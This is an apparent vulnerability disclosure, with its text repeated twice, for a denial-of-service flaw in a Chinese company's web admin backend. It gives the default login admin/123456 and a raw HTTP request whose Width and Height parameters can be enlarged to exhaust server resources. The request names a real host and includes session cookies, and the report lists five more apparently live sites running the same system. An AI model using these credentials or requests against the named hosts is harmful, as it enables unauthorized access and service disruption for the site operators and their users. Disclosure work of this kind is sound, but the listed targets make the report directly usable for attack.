There is a denial of service vulnerability in the background management system of Shanxi Internet Chuangxiang Technology Co., Ltd
The company of the vulnerability product is:Shanxi Internet Chuangxiang Technology Co., Ltd(山西互联创想科技有限公司)
You can log in to the background with a weak password to view it:admin/123456
This denial of service vulnerability occurs in an interface that retrieves images after logging in to the backend.
This API passes parameters through get, in which the Width parameter and Height parameter can be controlled, and the values of these two parameters can be enlarged wirelessly, resulting in the larger image being taken, resulting in a waste of resources, resulting in an obvious access delay, and a denial of service attack can be caused when the parameter value is large enough.
The packets are as follows:
GET /Upload/uploadpic.html?Width=100&Height=100&BackCall=head&Img=/Public/attached/201601/1453389194.png HTTP/1.1
Host: bbq.nplusc.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://bbq.nplusc.cn/Personal/profile.html
Cookie: PHPSESSID=mob625hc2sauti8b278b3uorag; auth=b55cf8798d76f13666c88a191c647c2e%2Cde1d1303fb75d48e8760b821e89effb3
Upgrade-Insecure-Requests: 1
Priority: u=4
There is a denial of service vulnerability in the background management system of Shanxi Internet Chuangxiang Technology Co., Ltd
The company of the vulnerability product is:Shanxi Internet Chuangxiang Technology Co., Ltd(山西互联创想科技有限公司) You can log in to the background with a weak password to view it:admin/123456
Vulnerability details: Access the vulnerability URL:http://bbq.nplusc.cn/login/index.html
This denial of service vulnerability occurs in an interface that retrieves images after logging in to the backend.
This API passes parameters through get, in which the Width parameter and Height parameter can be controlled, and the values of these two parameters can be enlarged wirelessly, resulting in the larger image being taken, resulting in a waste of resources, resulting in an obvious access delay, and a denial of service attack can be caused when the parameter value is large enough.
The packets are as follows: GET /Upload/uploadpic.html?Width=100&Height=100&BackCall=head&Img=/Public/attached/201601/1453389194.png HTTP/1.1 Host: bbq.nplusc.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Referer: http://bbq.nplusc.cn/Personal/profile.html Cookie: PHPSESSID=mob625hc2sauti8b278b3uorag; auth=b55cf8798d76f13666c88a191c647c2e%2Cde1d1303fb75d48e8760b821e89effb3 Upgrade-Insecure-Requests: 1 Priority: u=4
Remediation scenarios:Tightly limit the size of the data that can be taken from server 1 other URL:https://baoming.nate.org.cn/login/index.html,https://juhui.labacai.com/login/index.html,https://a.qiyeku.com/login/index.html,https://shop.labacai.com/login/index.html,https://ziliao.qiangshangkeji.com/login/index.html
Discover people:dabaizhizhu